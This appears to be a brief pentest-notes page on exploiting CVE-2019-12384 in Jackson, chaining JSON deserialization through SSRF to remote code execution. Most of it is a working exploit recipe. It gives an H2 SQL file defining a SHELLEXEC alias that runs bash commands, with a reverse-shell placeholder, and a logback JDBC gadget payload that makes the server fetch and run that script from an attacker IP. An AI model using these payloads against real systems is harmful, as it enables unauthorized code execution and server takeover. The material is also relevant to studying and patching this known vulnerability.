com.fasterxml.jackson

CVE-2019-12384 | com.fasterxml.jackson

GitHub - jas502n/CVE-2019-12384: Jackson Rce For CVE-2019-12384GitHub

Jackson gadgets - Anatomy of a vulnerability · Doyensec's Blogblog.doyensec.com

SSRF to RCE

their is vulnearability in jackson parser , this takes advantage of JSON Deseralization and do a SSRF , by which we can chain it to RCE Prerequsites :-

application takes json data by user
application process that json data using com.fasterxml.jackson

in order to exploit :-

make a sql file , which the server is going to recieve and edit your payload in it

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('reverse shell payload here')

set up a local server on your machine using python
in burp suite or in input field enter this ruby payload :-

"ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.16.4:8000/inject.sql'"}]

Make sure , changing ip address in ruby payload and command injection in sql file , accordingly

Nextstrapi

Last updated 2 years ago

hashtagCVE-2019-12384 | com.fasterxml.jackson

hashtagSSRF to RCE

CVE-2019-12384 | com.fasterxml.jackson

SSRF to RCE